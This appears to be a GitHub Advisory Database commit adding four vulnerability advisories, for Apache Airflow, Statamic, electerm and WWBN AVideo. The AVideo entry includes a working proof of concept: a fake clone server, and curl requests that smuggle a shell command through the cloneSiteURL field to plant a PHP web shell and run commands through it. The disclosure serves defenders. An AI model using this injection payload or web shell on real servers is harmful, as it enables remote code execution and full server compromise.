Publish Advisories

GHSA-4g48-54q2-fg7q
GHSA-4jjr-vmv7-wh4w
GHSA-wxw2-rwmh-vr8f
GHSA-xr6f-h4x7-r6qp
GHSA-4g48-54q2-fg7q

Author: advisory-database[bot]

advisories/github-reviewed/2026/04/GHSA-4g48-54q2-fg7q/GHSA-4g48-54q2-fg7q.json

@@ -0,0 +1,73 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-4g48-54q2-fg7q",
+  "modified": "2026-04-16T21:26:23Z",
+  "published": "2026-04-15T15:31:42Z",
+  "aliases": [
+    "CVE-2026-25219"
+  ],
+  "summary": "Apache Airlfow: Sensitive Azure Service Bus connection string (and possibly other providers) exposed to users with view access",
+  "details": "The `access_key` and `connection_string` connection properties were not marked as sensitive names in secrets masker. This means that user with read permission could see the values in Connection UI, as well as when Connection was accidently logged to logs, those values could be seen in the logs. Azure Service Bus used those properties to store sensitive values. Possibly other providers could be also affected if they used the same fields to store sensitive data.\n\nIf you used Azure Service Bus connection with those values set or if you have other connections with those values storing senesitve values, you should upgrade Airflow to 3.1.8.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "apache-airflow"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "3.1.8"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25219"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/apache/airflow/pull/61580"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/apache/airflow/pull/61582"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/apache/airflow"
+    },
+    {
+      "type": "WEB",
+      "url": "https://lists.apache.org/thread/t4dlmqkn0njz4chk3g7mdgzb96y4ttqh"
+    },
+    {
+      "type": "WEB",
+      "url": "http://www.openwall.com/lists/oss-security/2026/04/15/3"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-200"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-16T21:26:23Z",
+    "nvd_published_at": "2026-04-15T13:16:24Z"
+  }
+}

advisories/github-reviewed/2026/04/GHSA-4jjr-vmv7-wh4w/GHSA-4jjr-vmv7-wh4w.json

@@ -0,0 +1,74 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-4jjr-vmv7-wh4w",
+  "modified": "2026-04-16T21:25:35Z",
+  "published": "2026-04-16T21:25:35Z",
+  "aliases": [],
+  "summary": "Statamic: Unsafe method invocation via query value resolution allows data destruction",
+  "details": "### Impact\n\nManipulating query parameters on Control Panel and REST API endpoints, or arguments in GraphQL queries, could result in the loss of content, assets, and user accounts.\n\nThe Control Panel requires authentication with minimal permissions in order to exploit. e.g. \"view entries\" permission to delete entries, or \"view users\" permission to delete users, etc.\n\nThe REST and GraphQL API exploits do not require any permissions, however neither are enabled by default. In order to be exploited, they would need to be explicitly enabled with no authentication configured, and the specific resources enabled too.\n\nSites that enable the REST or GraphQL API without authentication should treat patching as critical priority.\n\n### Patches\n\nThis has been fixed in 5.73.20 and 6.13.0.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "statamic/cms"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "5.73.20"
+            }
+          ]
+        }
+      ]
+    },
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "statamic/cms"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "6.0.0-alpha.1"
+            },
+            {
+              "fixed": "6.13.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/statamic/cms/security/advisories/GHSA-4jjr-vmv7-wh4w"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/statamic/cms"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-470"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-16T21:25:35Z",
+    "nvd_published_at": null
+  }
+}

advisories/github-reviewed/2026/04/GHSA-wxw2-rwmh-vr8f/GHSA-wxw2-rwmh-vr8f.json

@@ -0,0 +1,57 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-wxw2-rwmh-vr8f",
+  "modified": "2026-04-16T21:24:22Z",
+  "published": "2026-04-16T21:24:22Z",
+  "aliases": [],
+  "summary": "electerm: electerm_install_script_CommandInjection Vulnerability Report",
+  "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\n**Two Command Injection vulnerabilities in electerm:**\n\n1. **macOS Installer** (`electerm_CommandInjection_02`): A command injection vulnerability exists in `github.com/elcterm/electerm/npm/install.js:150`. The `runMac()` function appends attacker-controlled remote `releaseInfo.name` directly into an `exec(\"open ...\")` command without validation.\n\n2. **Linux Installer** (`electerm_CommandInjection_01`): A command injection vulnerability exists in `github.com/elcterm/electerm/npm/install.js:130`. The `runLinux()` function appends attacker-controlled remote version strings directly into an `exec(\"rm -rf ...\")` command without validation.\n\n**Who is impacted:** Users who run `npm install -g electerm`. An attacker who can control the remote release metadata (version string or release name) served by the project's update server could execute arbitrary system commands, tamper local files, and escalate compromise of development/runtime assets.\n\n---\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\nFixed in [59708b38c8a52f5db59d7d4eff98e31d573128ee](https://github.com/electerm/electerm/commit/59708b38c8a52f5db59d7d4eff98e31d573128ee), user no need to upgrade, the new version already published in npm\n\n---\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nno",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "electerm"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "3.3.8"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/electerm/electerm/security/advisories/GHSA-wxw2-rwmh-vr8f"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/electerm/electerm/commit/59708b38c8a52f5db59d7d4eff98e31d573128ee"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/electerm/electerm"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [],
+    "severity": "CRITICAL",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-16T21:24:22Z",
+    "nvd_published_at": null
+  }
+}

advisories/github-reviewed/2026/04/GHSA-xr6f-h4x7-r6qp/GHSA-xr6f-h4x7-r6qp.json

@@ -0,0 +1,59 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-xr6f-h4x7-r6qp",
+  "modified": "2026-04-16T21:25:20Z",
+  "published": "2026-04-16T21:25:19Z",
+  "aliases": [],
+  "summary": "WWBN AVideo: RCE cause by clonesite plugin",
+  "details": "Description\n\n## Summary\n\nThe `cloneServer.json.php` endpoint in the CloneSite plugin constructs shell commands using user-controlled input (`url` parameter) without proper sanitization. The input is directly concatenated into a `wget` command executed via `exec()`, allowing command injection.\n\nAn attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., `;`). This leads to **Remote Code Execution (RCE)** on the server.\n\n## Details\n\nInside `plugin/CloneSite/cloneClient.json.php`(line112) didn't have proper sanitization\n\n```php\n$objClone->cloneSiteURL = str_replace(\"'\", '', escapeshellarg($objClone->cloneSiteURL));\n```\n\nuse `str_replace ` make `'` added by `escapeshellarg` become ` ` so hacker can inject evil `cloneSiteURL` to rce\n\n```php\n$sqlURL = \"{$objClone->cloneSiteURL}videos/clones/{$json->sqlFile}\"; \\\\116\n$cmd = \"wget -O {$sqlFile} {$sqlURL}\"; \\\\117\nexec($cmd . \" 2>&1\", $output, $return_val);                 \\\\119\n```\n\nThe attack flow\n\n1. make a evil site to provide date\n\n2. add  evil url in `objects/pluginAddDataObject.json.php` \n\n3. access `plugin/CloneSite/cloneClient.json.php` to trigger rce\n\n   \n\n## Poc\n\nmake a evil site use python like this \n\n```python\nfrom flask import Flask, jsonify, request\n\napp = Flask(__name__)\n\n@app.route('/', defaults={'path': ''})\n@app.route('/<path:path>')\ndef catch_all(path):\n    print(\"PATH:\", path)\n\n\n    return jsonify({\n            \"error\": False,\n            \"msg\": \"\",\n            \"url\": \"http://target-site.com/\",\n            \"key\": \"target_clone_key\",\n            \"useRsync\": 0,\n            \"videosDir\": \"/var/www/html/AVideo/videos/\",\n            \"sqlFile\": \"Clone_mysqlDump_evil123.sql\",\n            \"videoFiles\": [],\n            \"photoFiles\": []\n        })\n\n\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port=8071)\n```\n\nchange url with payload like (need admin)\n\n```shell\ncurl -b 'PHPSESSID=<admin_session>'\n-X POST \"http://127.0.0.1/objects/pluginAddDataObject.json.php\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"cloneSiteURL\":\"http://127.0.0.1:8071/;echo${IFS}\\\"<?=system(\\\\$_POST[1])?>\\\"${IFS}>1.php;/\",\n    \"cloneSiteSSHIP\":\"127.0.0.1\",\n    \"cloneSiteSSHUser\":\"1\",\n    \"cloneSiteSSHPort\":\"22\",\n    \"cloneSiteSSHPassword\":{\n        \"type\":\"encrypted\",\n        \"value\":\"cU1SVkhSVkxqMmxDZlUrSFhNZnRvcFBtTmI3UXNGZ0VFVWxlLzdJL0pjWGFiVXgyb2Iyci9OOE5LN0p6TmN6Zg==\"\n    },\n    \"useRsync\":true,\n    \"MaintenanceMode\":false,\n    \"myKey\":\"ba882541262f3202ee5a5ad790ae5b70\"\n}' \n#inject evil code\ncurl \"http://127.0.0.1/plugin/CloneSite/cloneClient.json.php\" #trigger rce to write 1.php\ncurl \"http://127.0.0.1/plugin/CloneSite/1.php\" \n -d '1=id'\n #uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)\n```\n\nthis payload is to create a web shell \n\nthen access `plugin/CloneSite/cloneClient.json.php` \n\n`1.php`will be created \n\n## impact\n\n- **Remote Code Execution**: An attacker can write arbitrary PHP code to any writable web-accessible directory, achieving full server compromise.\n\n- **Full server compromise**: With arbitrary PHP execution as the web server user, the attacker can read/modify the database, access all user data, pivot to other services, and potentially escalate privileges on the host.\n\n## Recommended Fix\n\nadd more powerful sanitization for `$objClone->cloneSiteURL`",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "wwbn/avideo"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "last_affected": "29.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-xr6f-h4x7-r6qp"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/WWBN/AVideo/commit/473c609fc2defdea8b937b00e86ce88eba1f15bb"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/WWBN/AVideo"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-78"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-16T21:25:19Z",
+    "nvd_published_at": null
+  }
+}